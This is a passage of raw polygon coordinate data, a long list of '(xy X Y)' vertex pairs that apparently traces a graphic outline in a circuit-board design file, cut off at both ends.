(xy 24.410907 -20.119829) (xy 24.844475 -20.257708) (xy 25.380489 -20.404877) (xy 26.023251 -20.562367)
(xy 26.777062 -20.731204) (xy 27.646222 -20.912417) (xy 28.635034 -21.107034) (xy 29.179276 -21.210371)
(xy 29.955226 -21.361778) (xy 30.686492 -21.515528) (xy 31.365378 -21.6693) (xy 31.984189 -21.820771)
(xy 32.535229 -21.96762) (xy 33.010805 -22.107527) (xy 33.403219 -22.23817) (xy 33.704777 -22.357227)
(xy 33.907784 -22.462377) (xy 34.004544 -22.551298) (xy 33.987363 -22.62167) (xy 33.940495 -22.646634)
(xy 33.820177 -22.663539) (xy 33.592758 -22.66862) (xy 33.277486 -22.662908) (xy 32.893607 -22.64743)
(xy 32.46037 -22.623216) (xy 31.99702 -22.591295) (xy 31.522805 -22.552696) (xy 31.056973 -22.508448)
(xy 30.76575 -22.47691) (xy 29.611947 -22.332681) (xy 28.526351 -22.170306) (xy 27.450506 -21.980897)
(xy 27.2415 -21.94095) (xy 26.927096 -21.881183) (xy 26.639548 -21.82981) (xy 26.365907 -21.786002)
(xy 26.093222 -21.748932) (xy 25.808543 -21.717771) (xy 25.498919 -21.691691) (xy 25.1514 -21.669863)
(xy 24.753037 -21.651459) (xy 24.290877 -21.635651) (xy 23.751973 -21.62161) (xy 23.123372 -21.608508)
(xy 22.392125 -21.595517) (xy 21.6535 -21.583519) (xy 20.83094 -21.570413) (xy 20.126174 -21.559153)
(xy 19.530005 -21.549759) (xy 19.033238 -21.542254) (xy 18.62668 -21.536661) (xy 18.301136 -21.533003)
(xy 18.04741 -21.531301) (xy 17.856309 -21.531577) (xy 17.718637 -21.533855) (xy 17.6252 -21.538156)
(xy 17.566804 -21.544504) (xy 17.534253 -21.552919) (xy 17.518352 -21.563425) (xy 17.509908 -21.576044)
(xy 17.499726 -21.590799) (xy 17.497054 -21.593628) (xy 17.468141 -21.683502) (xy 17.445808 -21.870889)
(xy 17.432858 -22.12636) (xy 17.43075 -22.289458) (xy 17.427722 -22.613562) (xy 17.406227 -22.843423)
(xy 17.347644 -22.995233) (xy 17.233355 -23.085182) (xy 17.04474 -23.12946) (xy 16.763179 -23.144257)
(xy 16.445996 -23.14575) (xy 16.071134 -23.142815) (xy 15.803475 -23.122181) (xy 15.623225 -23.066098)
(xy 15.510586 -22.95682) (xy 15.445762 -22.776598) (xy 15.408957 -22.507684) (xy 15.384791 -22.19435)
(xy 15.33525 -21.496951) (xy 14.946212 -21.9721) (xy 14.743573 -22.209339) (xy 14.519154 -22.455501)
(xy 14.291615 -22.692045) (xy 14.079614 -22.900432) (xy 13.901809 -23.062121) (xy 13.776859 -23.158571)
(xy 13.733141 -23.1775) (xy 13.655326 -23.14593) (xy 13.485282 -23.057402) (xy 13.239145 -22.921181)
(xy 12.933051 -22.746536) (xy 12.583136 -22.542733) (xy 12.205535 -22.319041) (xy 11.816385 -22.084728)
(xy 11.59158 -21.94751) (xy 11.250223 -21.741931) (xy 10.996712 -21.607618) (xy 10.812038 -21.547203)
(xy 10.67719 -21.563319) (xy 10.573158 -21.658597) (xy 10.48093 -21.835671) (xy 10.381496 -22.097173)
(xy 10.374739 -22.116015) (xy 10.193905 -22.588619) (xy 10.030714 -22.944632) (xy 9.880614 -23.192509)
(xy 9.73905 -23.340707) (xy 9.702568 -23.364242) (xy 9.587323 -23.415544) (xy 9.477897 -23.415016)
(xy 9.322478 -23.359042) (xy 9.265424 -23.333735) (xy 8.895993 -23.105828) (xy 8.581407 -22.792654)
(xy 8.346876 -22.424531) (xy 8.228263 -22.086357) (xy 8.144977 -21.925261) (xy 8.002885 -21.866264)
(xy 7.826595 -21.915698) (xy 7.755244 -21.964641) (xy 7.529424 -22.136625) (xy 7.345989 -22.243648)
(xy 7.154608 -22.307539) (xy 6.90495 -22.350128) (xy 6.85017 -22.357187) (xy 6.517058 -22.419724)
(xy 6.298291 -22.512513) (xy 6.183535 -22.641633) (xy 6.1595 -22.763522) (xy 6.115036 -22.901175)
(xy 6.007543 -23.044047) (xy 6.002527 -23.048829) (xy 5.803284 -23.155497) (xy 5.522574 -23.195377)
(xy 5.184325 -23.172543) (xy 4.812462 -23.091072) (xy 4.430909 -22.955039) (xy 4.063594 -22.768519)
(xy 3.954713 -22.699995) (xy 3.710043 -22.518483) (xy 3.534635 -22.33087) (xy 3.400106 -22.098075)
(xy 3.278071 -21.781022) (xy 3.27025 -21.757634) (xy 3.1723 -21.505887) (xy 3.086755 -21.374668)
(xy 3.015523 -21.365719) (xy 2.961702 -21.476278) (xy 2.93868 -21.639681) (xy 2.926107 -21.89454)
(xy 2.923545 -22.205779) (xy 2.930561 -22.538322) (xy 2.946719 -22.857092) (xy 2.971585 -23.127012)
(xy 2.98319 -23.20925) (xy 3.009268 -23.353552) (xy 3.043123 -23.482268) (xy 3.091994 -23.59669)
(xy 3.163121 -23.698114) (xy 3.263744 -23.787832) (xy 3.401103 -23.867139) (xy 3.582437 -23.937329)
(xy 3.814986 -23.999697) (xy 4.10599 -24.055536) (xy 4.462688 -24.10614) (xy 4.892321 -24.152804)
(xy 5.402128 -24.196822) (xy 5.999348 -24.239487) (xy 6.691222 -24.282094) (xy 7.484989 -24.325937)
(xy 8.387889 -24.372311) (xy 9.407162 -24.422508) (xy 9.906 -24.446702) (xy 11.41578 -24.521342)
(xy 12.803163 -24.593325) (xy 14.072712 -24.662995) (xy 15.228993 -24.730696) (xy 16.276573 -24.796774)
(xy 17.220017 -24.861571) (xy 18.063891 -24.925434) (xy 18.81276 -24.988705) (xy 19.471191 -25.051729)
(xy 20.043748 -25.114852) (xy 20.534998 -25.178417) (xy 20.949506 -25.242768) (xy 21.271907 -25.303998)
(xy 21.581946 -25.381823) (xy 21.872245 -25.476422) (xy 22.119789 -25.577762) (xy 22.301565 -25.675808)
(xy 22.394558 -25.760526) (xy 22.400206 -25.795928) (xy 22.327414 -25.849022) (xy 22.168293 -25.900257)
(xy 22.029474 -25.927062) (xy 21.908147 -25.935619) (xy 21.668841 -25.943758) (xy 21.320575 -25.951457)
(xy 20.872369 -25.958696) (xy 20.333243 -25.96545) (xy 19.712216 -25.971699) (xy 19.018308 -25.977421)
(xy 18.260538 -25.982593) (xy 17.447927 -25.987194) (xy 16.589495 -25.991201) (xy 15.69426 -25.994592)
(xy 14.771243 -25.997346) (xy 13.829463 -25.999441) (xy 12.877941 -26.000853) (xy 11.925695 -26.001563)
(xy 10.981746 -26.001546) (xy 10.055114 -26.000783) (xy 9.154818 -25.999249) (xy 8.289877 -25.996924)
(xy 7.469312 -25.993785) (xy 6.702143 -25.989811) (xy 5.997388 -25.984979) (xy 5.364068 -25.979267)
(xy 4.811203 -25.972654) (xy 4.60375 -25.96958) (xy 2.807062 -25.940068) (xy 1.0495 -25.909143)
(xy -0.664706 -25.876941) (xy -2.331328 -25.843595) (xy -3.946136 -25.80924) (xy -5.5049 -25.774011)
(xy -7.003392 -25.738042) (xy -8.437381 -25.701467) (xy -9.802639 -25.66442) (xy -11.094937 -25.627037)
(xy -12.310044 -25.589451) (xy -13.443731 -25.551797) (xy -14.49177 -25.51421) (xy -15.44993 -25.476823)
(xy -16.313982 -25.439771) (xy -17.079698 -25.403189) (xy -17.742847 -25.367211) (xy -18.2992 -25.331971)
(xy -18.744528 -25.297604) (xy -19.074602 -25.264244) (xy -19.285192 -25.232025) (xy -19.363544 -25.207916)
(xy -19.431705 -25.157487) (xy -19.431 -25.144564) (xy -19.298407 -25.128238) (xy -19.099001 -25.112766)
(xy -18.828679 -25.098083) (xy -18.48334 -25.084121) (xy -18.058879 -25.070815) (xy -17.551196 -25.058099)
(xy -16.956186 -25.045906) (xy -16.269747 -25.034171) (xy -15.487777 -25.022825) (xy -14.606173 -25.011805)
(xy -13.620832 -25.001042) (xy -12.527652 -24.990471) (xy -11.322529 -24.980026) (xy -10.001362 -24.969641)
(xy -8.560047 -24.959248) (xy -7.52475 -24.952246) (xy -6.392336 -24.944496) (xy -5.29064 -24.936429)
(xy -4.226721 -24.928119) (xy -3.207642 -24.919644) (xy -2.240463 -24.911078) (xy -1.332245 -24.902498)
(xy -0.490049 -24.893979) (xy 0.279063 -24.885598) (xy 0.968032 -24.87743) (xy 1.569797 -24.869551)
(xy 2.077295 -24.862037) (xy 2.483467 -24.854964) (xy 2.781251 -24.848408) (xy 2.963587 -24.842444)
(xy 3.01625 -24.838996) (xy 3.39725 -24.792854) (xy 2.9845 -24.746276) (xy 2.579791 -24.707897)
(xy 2.055097 -24.670191) (xy 1.417436 -24.633399) (xy 0.67382 -24.59776) (xy -0.168734 -24.563514)
(xy -1.103212 -24.530902) (xy -2.122598 -24.500163) (xy -3.219876 -24.471538) (xy -4.388033 -24.445265)
(xy -5.620052 -24.421586) (xy -6.908919 -24.400739) (xy -7.269517 -24.395575) (xy -10.379783 -24.35225)
(xy -10.459441 -23.794226) (xy -10.466899 -23.748648) (xy -7.747 -23.748648) (xy -7.688224 -23.81172)
(xy -7.530192 -23.863997) (xy -7.300354 -23.903355) (xy -7.026159 -23.927672) (xy -6.735056 -23.934823)
(xy -6.454493 -23.922687) (xy -6.211919 -23.88914) (xy -6.143625 -23.872661) (xy -5.964379 -23.800502)
(xy -5.899984 -23.721978) (xy -5.938952 -23.643648) (xy -6.069792 -23.57207) (xy -6.281016 -23.513802)
(xy -6.561134 -23.475402) (xy -6.860878 -23.46325) (xy -7.168344 -23.47112) (xy -7.380584 -23.497987)
(xy -7.528583 -23.548735) (xy -7.575253 -23.575838) (xy -7.694095 -23.670591) (xy -7.746844 -23.745971)
(xy -7.747 -23.748648) (xy -10.466899 -23.748648) (xy -10.516319 -23.446629) (xy -10.535656 -23.368313)
(xy -4.888645 -23.368313) (xy -4.887443 -23.506196) (xy -4.868595 -23.537071) (xy -4.759409 -23.582341)
(xy -4.548813 -23.617863) (xy -4.26204 -23.643423) (xy -3.924322 -23.658804) (xy -3.560892 -23.663789)
(xy -3.196981 -23.658163) (xy -2.857822 -23.64171) (xy -2.841805 -23.640187) (xy 0.144725 -23.640187)
(xy 0.144858 -23.769935) (xy 0.218658 -23.858696) (xy 0.238125 -23.870913) (xy 0.358034 -23.902091)
(xy 0.570955 -23.923108) (xy 0.843298 -23.933893) (xy 1.141476 -23.934372) (xy 1.431901 -23.924473)
(xy 1.680985 -23.904123) (xy 1.851057 -23.874405) (xy 2.010606 -23.811351) (xy 2.108094 -23.738037)
(xy 2.115757 -23.7243) (xy 2.104356 -23.590352) (xy 2.000942 -23.40876) (xy 1.820525 -23.200258)
(xy 1.584914 -22.990939) (xy 1.293849 -22.786859) (xy 1.055869 -22.689674) (xy 0.850588 -22.702692)
(xy 0.657618 -22.829218) (xy 0.456571 -23.07256) (xy 0.380284 -23.186309) (xy 0.221964 -23.451596)
(xy 0.144725 -23.640187) (xy -2.841805 -23.640187) (xy -2.568648 -23.614214) (xy -2.35469 -23.575457)
(xy -2.301875 -23.559056) (xy -2.153482 -23.463831) (xy -2.095629 -23.31397) (xy -2.1277 -23.097655)
(xy -2.249081 -22.803068) (xy -2.261255 -22.778514) (xy -2.436004 -22.466575) (xy -2.585852 -22.27889)
(xy -2.710696 -22.215505) (xy -2.810428 -22.276467) (xy -2.884944 -22.461822) (xy -2.893496 -22.498331)
(xy -2.995779 -22.764497) (xy -3.160647 -22.978585) (xy -3.362851 -23.118683) (xy -3.577145 -23.162881)
(xy -3.647203 -23.152439) (xy -3.788149 -23.058123) (xy -3.89238 -22.87873) (xy -3.936733 -22.655455)
(xy -3.937 -22.636996) (xy -3.985736 -22.478926) (xy -4.110964 -22.404117) (xy -4.281219 -22.428943)
(xy -4.309933 -22.442932) (xy -4.451974 -22.558283) (xy -4.596365 -22.738853) (xy -4.727607 -22.954285)
(xy -4.8302 -23.174224) (xy -4.888645 -23.368313) (xy -10.535656 -23.368313) (xy -10.57495 -23.209176)
(xy -10.642165 -23.06511) (xy -10.724792 -22.997678) (xy -10.788501 -22.987) (xy -10.900256 -23.010342)
(xy -11.091077 -23.072147) (xy -11.323632 -23.160076) (xy -11.372522 -23.179982) (xy -11.610638 -23.269549)
(xy -11.816914 -23.331777) (xy -11.953147 -23.355476) (xy -11.96863 -23.354607) (xy -12.079858 -23.282128)
(xy -12.20829 -23.091425) (xy -12.28078 -22.948776) (xy -12.393136 -22.738225) (xy -12.505433 -22.569702)
(xy -12.586936 -22.485034) (xy -12.704975 -22.442683) (xy -12.910853 -22.397483) (xy -13.165877 -22.357503)
(xy -13.243864 -22.347996) (xy -13.579538 -22.296054) (xy -13.947466 -22.21805) (xy -14.26853 -22.130778)
(xy -14.271209 -22.129924) (xy -14.61399 -22.030721) (xy -14.878638 -21.984415) (xy -15.10215 -21.99029)
(xy -15.321524 -22.047632) (xy -15.467391 -22.106816) (xy -15.619391 -22.167513) (xy -15.764416 -22.204259)
(xy -15.936482 -22.220421) (xy -16.169604 -22.219365) (xy -16.469216 -22.205978) (xy -16.904511 -22.192644)
(xy -17.269725 -22.208885) (xy -17.601855 -22.262673) (xy -17.937899 -22.361982) (xy -18.314856 -22.514786)
(xy -18.669 -22.680062) (xy -19.191515 -22.925326) (xy -19.608026 -23.104668) (xy -19.920605 -23.218863)
(xy -20.131326 -23.268687) (xy -20.226712 -23.26321) (xy -20.298246 -23.221238) (xy -20.307219 -23.155293)
(xy -20.247489 -23.039325) (xy -20.136193 -22.879316) (xy -19.93825 -22.582845) (xy -19.817836 -22.335665)
(xy -19.759936 -22.100094) (xy -19.7485 -21.906478) (xy -19.758466 -21.666302) (xy -19.797566 -21.495277)
(xy -19.879608 -21.390486) (xy -20.018401 -21.349012) (xy -20.227752 -21.367938) (xy -20.521468 -21.444348)
(xy -20.913357 -21.575324) (xy -21.063098 -21.628769) (xy -21.660132 -21.837282) (xy -22.152365 -21.993695)
(xy -22.549955 -22.099883) (xy -22.86306 -22.15772) (xy -23.101839 -22.169082) (xy -23.27645 -22.135843)
(xy -23.397051 -22.059877) (xy -23.39737 -22.059558) (xy -23.462206 -21.943862) (xy -23.444384 -21.793254)
(xy -23.338953 -21.588911) (xy -23.23299 -21.434615) (xy -23.096756 -21.210291) (xy -23.05803 -21.05396)
(xy -23.107273 -20.965281) (xy -23.234945 -20.943911) (xy -23.431507 -20.989509) (xy -23.687419 -21.101733)
(xy -23.993142 -21.28024) (xy -24.268784 -21.471735) (xy -24.689934 -21.749367) (xy -25.097059 -21.952049)
(xy -25.467429 -22.069839) (xy -25.69709 -22.096492) (xy -25.90823 -22.067949) (xy -26.067846 -21.991846)
(xy -26.146499 -21.886343) (xy -26.144065 -21.820754) (xy -26.058154 -21.714498) (xy -25.882544 -21.592652)
(xy -25.649769 -21.474087) (xy -25.392365 -21.377675) (xy -25.367388 -21.370231) (xy -25.103639 -21.27268)
(xy -24.918055 -21.161099) (xy -24.831981 -21.049196) (xy -24.828501 -21.024156) (xy -24.88843 -20.949736)
(xy -25.053939 -20.881744) (xy -25.303606 -20.826173) (xy -25.616013 -20.789021) (xy -25.68575 -20.78423)
(xy -26.091654 -20.746353) (xy -26.382106 -20.686119) (xy -26.556944 -20.599595) (xy -26.616008 -20.48285)
(xy -26.559135 -20.331953) (xy -26.386165 -20.142972) (xy -26.096935 -19.911975) (xy -25.691284 -19.635031)
(xy -25.637112 -19.600026) (xy -25.298802 -19.364149) (xy -25.078534 -19.166798) (xy -24.974185 -19.005397)
(xy -24.98363 -18.877374) (xy -25.011468 -18.841902) (xy -25.122997 -18.799251) (xy -25.341884 -18.773971)
(xy -25.649771 -18.765415) (xy -26.0283 -18.772938) (xy -26.459114 -18.795893) (xy -26.923854 -18.833633)
(xy -27.404162 -18.885511) (xy -27.813 -18.940545) (xy -28.490432 -19.036579) (xy -29.055601 -19.106296)
(xy -29.520477 -19.14976) (xy -29.897026 -19.167035) (xy -30.197217 -19.158187) (xy -30.433017 -19.123279)
(xy -30.616395 -19.062375) (xy -30.759317 -18.975541) (xy -30.782404 -18.956532) (xy -30.888378 -18.840369)
(xy -30.949599 -18.692745) (xy -30.983897 -18.468407) (xy -30.986707 -18.438053) (xy -30.99685 -18.314124)
(xy -31.01021 -18.209947) (xy -31.037077 -18.123726) (xy -31.087739 -18.053666) (xy -31.172488 -17.997973)
(xy -31.301614 -17.954852) (xy -31.485406 -17.922507) (xy -31.734155 -17.899145) (xy -32.05815 -17.882969)
(xy -32.467681 -17.872185) (xy -32.97304 -17.864999) (xy -33.584514 -17.859616) (xy -34.312395 -17.85424)
(xy -34.334707 -17.854071) (xy -35.048352 -17.847992) (xy -35.644597 -17.841305) (xy -36.133041 -17.833668)
(xy -36.523284 -17.824739) (xy -36.824925 -17.814178) (xy -37.047564 -17.801642) (xy -37.2008 -17.786791)
(xy -37.294232 -17.769284) (xy -37.33746 -17.748778) (xy -37.338835 -17.747244) (xy -37.372573 -17.621295)
(xy -37.34814 -17.435154) (xy -37.278176 -17.234053) (xy -37.175322 -17.063228) (xy -37.135829 -17.020755)
(xy -37.070752 -16.968851) (xy -36.988785 -16.926952) (xy -36.874368 -16.892995) (xy -36.711944 -16.86492)
(xy -36.485952 -16.840665) (xy -36.180836 -16.818171) (xy -35.781034 -16.795375) (xy -35.27099 -16.770217)
(xy -35.229765 -16.768267) (xy -34.769645 -16.74446) (xy -34.416681 -16.720574) (xy -34.15105 -16.694239)
(xy -33.95293 -16.663083) (xy -33.802497 -16.624736) (xy -33.698085 -16.585055) (xy -33.489727 -16.479401)
(xy -33.369809 -16.368367) (xy -33.304894 -16.210874) (xy -33.27692 -16.067656) (xy -33.237384 -15.914132)
(xy -33.15847 -15.845602) (xy -33.032926 -15.823186) (xy -32.873349 -15.828817) (xy -32.636481 -15.861736)
(xy -32.367418 -15.915312) (xy -32.303406 -15.930424) (xy -31.967177 -16.004699) (xy -31.580235 -16.077854)
(xy -31.17646 -16.144708) (xy -30.789735 -16.200083) (xy -30.45394 -16.238798) (xy -30.202957 -16.255672)
(xy -30.173974 -16.256) (xy -30.000772 -16.239633) (xy -29.886366 -16.198855) (xy -29.871365 -16.183786)
(xy -29.867193 -16.116187) (xy -29.933467 -16.033408) (xy -30.075672 -15.933107) (xy -30.299287 -15.812945)
(xy -30.609795 -15.670581) (xy -31.012678 -15.503673) (xy -31.513416 -15.309883) (xy -32.117491 -15.086868)
(xy -32.830386 -14.832289) (xy -33.657581 -14.543805) (xy -33.94075 -14.446205) (xy -34.890166 -14.117723)
(xy -35.723141 -13.82502) (xy -36.444513 -13.566175) (xy -37.059119 -13.339272) (xy -37.571793 -13.142391)
(xy -37.987374 -12.973614) (xy -38.310698 -12.831022) (xy -38.5466 -12.712696) (xy -38.699919 -12.616718)
(xy -38.775489 -12.541169) (xy -38.782759 -12.525375) (xy -38.764784 -12.50582) (xy -38.690729 -12.489513)
(xy -38.551555 -12.476193) (xy -38.338223 -12.465602) (xy -38.041694 -12.45748) (xy -37.652931 -12.45157)
(xy -37.162893 -12.447611) (xy -36.562542 -12.445345) (xy -35.962167 -12.444559) (xy -35.338015 -12.44284)
(xy -34.724171 -12.43852) (xy -34.138489 -12.431909) (xy -33.598823 -12.423314) (xy -33.123029 -12.413046)
(xy -32.728959 -12.401413) (xy -32.434469 -12.388723) (xy -32.323878 -12.381599) (xy -31.867414 -12.340145)
(xy -31.45429 -12.291168) (xy -31.105299 -12.23785) (xy -30.841233 -12.183378) (xy -30.682886 -12.130934)
(xy -30.681112 -12.130018) (xy -30.695899 -12.089135) (xy -30.819262 -12.016533) (xy -31.038713 -11.918864)
(xy -31.189112 -11.859439) (xy -31.309748 -11.814265) (xy -18.656115 -11.814265) (xy -18.652722 -11.828085)
(xy -18.570039 -11.91485) (xy -18.386773 -12.020099) (xy -18.126026 -12.133481) (xy -17.810897 -12.244646)
(xy -17.555841 -12.319513) (xy -17.198604 -12.431422) (xy -16.872375 -12.563005) (xy -16.603393 -12.701502)
(xy -16.417895 -12.834151) (xy -16.360391 -12.900915) (xy -16.343937 -13.04) (xy -16.410865 -13.237066)
(xy -16.544879 -13.471397) (xy -16.729683 -13.722278) (xy -16.948979 -13.968994) (xy -17.186471 -14.19083)
(xy -17.425861 -14.367072) (xy -17.578205 -14.448892) (xy -17.761958 -14.5551) (xy -17.841622 -14.660529)
(xy -17.8435 -14.677602) (xy -17.804194 -14.77529) (xy -17.699984 -14.92896) (xy -17.551434 -15.115897)
(xy -17.379107 -15.313384) (xy -17.203569 -15.498704) (xy -17.045382 -15.649142) (xy -16.92511 -15.74198)
(xy -16.866067 -15.757351) (xy -16.525706 -15.496202) (xy -16.200873 -15.253306) (xy -15.911198 -15.042857)
(xy -15.676307 -14.87905) (xy -15.515829 -14.776077) (xy -15.487192 -14.760229) (xy -15.345368 -14.696862)
(xy -15.25961 -14.699456) (xy -15.191491 -14.753295) (xy -15.108865 -14.914459) (xy -15.069441 -15.179253)
(xy -15.073883 -15.53164) (xy -15.122854 -15.955587) (xy -15.137916 -16.046782) (xy -15.259746 -16.633694)
(xy -15.410638 -17.128099) (xy -15.602987 -17.56339) (xy -15.849186 -17.972962) (xy -15.857099 -17.984566)
(xy -16.003494 -18.204736) (xy -16.117505 -18.387924) (xy -16.182988 -18.50759) (xy -16.1925 -18.535912)
(xy -16.136634 -18.607931) (xy -15.994995 -18.647668) (xy -15.80652 -18.646837) (xy -15.730699 -18.634158)
(xy -15.380471 -18.511717) (xy -14.97235 -18.285111) (xy -14.514292 -17.958764) (xy -14.50842 -17.954178)
(xy -14.162081 -17.700015) (xy -13.853041 -17.505622) (xy -13.598732 -17.380845) (xy -13.416587 -17.335529)
(xy -13.413004 -17.3355) (xy -13.260676 -17.388786) (xy -13.101331 -17.524725) (xy -12.973554 -17.707439)
(xy -12.94552 -17.770222) (xy -12.904032 -17.907434) (xy -12.848019 -18.130078) (xy -12.787118 -18.398909)
(xy -12.762654 -18.51492) (xy -12.676127 -18.894358) (xy -12.593002 -19.180704) (xy -12.516988 -19.363133)
(xy -12.451795 -19.430821) (xy -12.448695 -19.431) (xy -12.372359 -19.382543) (xy -12.236008 -19.248409)
(xy -12.054572 -19.045449) (xy -11.842982 -18.790514) (xy -11.616167 -18.500455) (xy -11.569472 -18.43862)
(xy -11.206601 -17.997874) (xy -10.864698 -17.674236) (xy -10.534818 -17.461388) (xy -10.208017 -17.35301)
(xy -10.007945 -17.3355) (xy -9.717528 -17.380079) (xy -9.508112 -17.515752) (xy -9.378097 -17.745418)
(xy -9.325883 -18.071977) (xy -9.34987 -18.498329) (xy -9.353053 -18.522409) (xy -9.378583 -18.76141)
(xy -9.387393 -18.959019) (xy -9.37775 -19.074399) (xy -9.376622 -19.077621) (xy -9.296146 -19.165569)
(xy -9.182617 -19.162605) (xy -9.067128 -19.087424) (xy -8.980774 -18.958724) (xy -8.9535 -18.823214)
(xy -8.898656 -18.633804) (xy -8.746498 -18.499512) (xy -8.515593 -18.423484) (xy -8.224505 -18.408863)
(xy -7.891799 -18.458794) (xy -7.53604 -18.576421) (xy -7.52475 -18.581223) (xy -7.207547 -18.709727)
(xy -6.968813 -18.777568) (xy -6.77362 -18.78127) (xy -6.587038 -18.717355) (xy -6.374139 -18.582343)
(xy -6.197708 -18.449078) (xy -5.899035 -18.248776) (xy -5.653835 -18.159973) (xy -5.451496 -18.184525)
(xy -5.281406 -18.324286) (xy -5.13295 -18.581112) (xy -5.107849 -18.639573) (xy -4.974184 -18.902777)
(xy -4.836071 -19.064894) (xy -4.717877 -19.1135) (xy -4.581271 -19.053296) (xy -4.434945 -18.882755)
(xy -4.289018 -18.616978) (xy -4.153891 -18.271906) (xy -4.008482 -17.905344) (xy -3.848092 -17.6235)
(xy -3.775768 -17.532909) (xy -3.641129 -17.39774) (xy -3.542062 -17.34411) (xy -3.435485 -17.353844)
(xy -3.387572 -17.369155) (xy -3.280301 -17.42517) (xy -3.19838 -17.52622) (xy -3.121264 -17.703359)
(xy -3.073802 -17.843393) (xy -2.914279 -18.217538) (xy -2.714813 -18.472958) (xy -2.473273 -18.612166)
(xy -2.408953 -18.628534) (xy -2.228141 -18.686149) (xy -1.978144 -18.792927) (xy -1.696951 -18.929901)
(xy -1.422556 -19.078101) (xy -1.19295 -19.21856) (xy -1.111701 -19.276211) (xy -0.940343 -19.38957)
(xy -0.73837 -19.499577) (xy -0.551141 -19.583607) (xy -0.424451 -19.619014) (xy -0.332874 -19.594469)
(xy -0.233951 -19.550064) (xy -0.020369 -19.40787) (xy 0.130404 -19.244492) (xy 0.190384 -19.090622)
(xy 0.1905 -19.084549) (xy 0.159105 -18.972075) (xy 0.075174 -18.785061) (xy -0.045915 -18.556279)
(xy -0.106278 -18.452048) (xy -0.272552 -18.151298) (xy -0.314168 -18.050899) (xy 29.602822 -18.050899)
(xy 29.638267 -18.158513) (xy 29.792521 -18.255567) (xy 29.996188 -18.310655) (xy 30.245853 -18.310272)
(xy 30.561124 -18.251931) (xy 30.961607 -18.133143) (xy 31.082643 -18.091864) (xy 31.59125 -17.914728)
(xy 30.6078 -17.926739) (xy 30.231981 -17.932593) (xy 29.964469 -17.941042) (xy 29.786571 -17.954393)
(xy 29.679594 -17.974958) (xy 29.624845 -18.005045) (xy 29.603631 -18.046963) (xy 29.602822 -18.050899)
(xy -0.314168 -18.050899) (xy -0.368788 -17.919131) (xy -0.406427 -17.726714) (xy -0.407903 -17.692054)
(xy -0.41275 -17.43075) (xy 0.1905 -17.43075) (xy 0.475686 -17.428417) (xy 0.678116 -17.413995)
(xy 0.842029 -17.376348) (xy 1.011665 -17.304341) (xy 1.231265 -17.186838) (xy 1.290515 -17.153865)
(xy 1.591085 -17.000113) (xy 1.822618 -16.922609) (xy 2.016135 -16.919386) (xy 2.202654 -16.988475)
(xy 2.356181 -17.086257) (xy 2.649041 -17.24568) (xy 3.055511 -17.391718) (xy 3.562597 -17.521033)
(xy 4.157307 -17.630286) (xy 4.79425 -17.712734) (xy 5.147783 -17.745246) (xy 5.516192 -17.77052)
(xy 5.87614 -17.787936) (xy 6.20429 -17.796876) (xy 6.477307 -17.796719) (xy 6.671853 -17.786846)
(xy 6.764593 -17.766636) (xy 6.766389 -17.765103) (xy 6.750656 -17.699178) (xy 6.66382 -17.571388)
(xy 6.526138 -17.41102) (xy 6.354804 -17.21888) (xy 6.249814 -17.064006) (xy 6.185856 -16.895755)
(xy 6.137616 -16.663484) (xy 6.129869 -16.618202) (xy 6.104064 -16.497256) (xy 6.059704 -16.410164)
(xy 5.974074 -16.342588) (xy 5.82446 -16.280193) (xy 5.588147 -16.208642) (xy 5.3975 -16.155954)
(xy 5.008127 -16.032651) (xy 4.698064 -15.900087) (xy 4.477653 -15.765227) (xy 4.357233 -15.635033)
(xy 4.347145 -15.516469) (xy 4.379595 -15.470504) (xy 4.518585 -15.406829) (xy 4.761445 -15.37734)
(xy 5.089895 -15.38145) (xy 5.485658 -15.418573) (xy 5.930455 -15.488121) (xy 6.126164 -15.526582)
(xy 6.586538 -15.61392) (xy 6.92964 -15.659639) (xy 7.158076 -15.664061) (xy 7.199118 -15.658465)
(xy 7.403837 -15.5803) (xy 7.611994 -15.438119) (xy 7.791167 -15.262224) (xy 7.908933 -15.082919)
(xy 7.9375 -14.968361) (xy 7.929742 -14.880141) (xy 7.892868 -14.816979) (xy 7.806469 -14.771376)
(xy 7.65014 -14.735832) (xy 7.403475 -14.702845) (xy 7.137426 -14.674292) (xy 6.686452 -14.610328)
(xy 6.351863 -14.52224) (xy 6.1885 -14.439495) (xy 32.079366 -14.439495) (xy 32.163207 -14.537664)
(xy 32.210375 -14.573316) (xy 32.397358 -14.637048) (xy 32.684664 -14.636624) (xy 33.06346 -14.572804)
(xy 33.462235 -14.46579) (xy 33.680952 -14.393596) (xy 33.852209 -14.327088) (xy 33.937575 -14.281559)
(xy 33.920133 -14.24689) (xy 33.801119 -14.222288) (xy 33.605544 -14.207548) (xy 33.358421 -14.202465)
(xy 33.084759 -14.206834) (xy 32.809572 -14.220448) (xy 32.55787 -14.243104) (xy 32.354666 -14.274595)
(xy 32.273875 -14.295212) (xy 32.115062 -14.363904) (xy 32.079366 -14.439495) (xy 6.1885 -14.439495)
(xy 6.12485 -14.407256) (xy 6.040599 -14.329086) (xy 5.991025 -14.205171) (xy 6.054245 -14.10737)
(xy 6.216903 -14.047152) (xy 6.384916 -14.0335) (xy 6.586017 -14.014869) (xy 6.719111 -13.943905)
(xy 6.785317 -13.871643) (xy 8.266854 -13.871643) (xy 8.28943 -13.970068) (xy 8.396129 -14.061649)
(xy 8.544617 -14.143105) (xy 8.687007 -14.149824) (xy 8.854116 -14.098571) (xy 8.985314 -13.996826)
(xy 9.011812 -13.85521) (xy 8.9408 -13.7287) (xy 8.804328 -13.666533) (xy 8.615466 -13.65786)
(xy 8.435826 -13.7002) (xy 8.354785 -13.752285) (xy 8.266854 -13.871643) (xy 6.785317 -13.871643)
(xy 6.7873 -13.869479) (xy 6.927075 -13.636773) (xy 7.056711 -13.324399) (xy 7.15971 -12.979532)
(xy 7.219576 -12.649345) (xy 7.221821 -12.62698) (xy 7.255486 -12.268211) (xy 7.009118 -12.10619)
(xy 6.608377 -11.916312) (xy 6.173776 -11.843483) (xy 5.801358 -11.876345) (xy 5.544609 -11.914719)
(xy 5.392777 -11.898969) (xy 5.335186 -11.827573) (xy 5.334 -11.809822) (xy 5.393775 -11.698337)
(xy 5.573196 -11.546067) (xy 5.872408 -11.352916) (xy 6.291553 -11.118786) (xy 6.57225 -10.973024)
(xy 6.98492 -10.7605) (xy 7.298538 -10.591449) (xy 7.529003 -10.455358) (xy 7.692216 -10.341712)
(xy 7.804079 -10.239999) (xy 7.880493 -10.139705) (xy 7.909218 -10.08904) (xy 7.962338 -9.951984)
(xy 7.938275 -9.848727) (xy 7.908054 -9.80329) (xy 7.857953 -9.752661) (xy 7.780041 -9.718576)
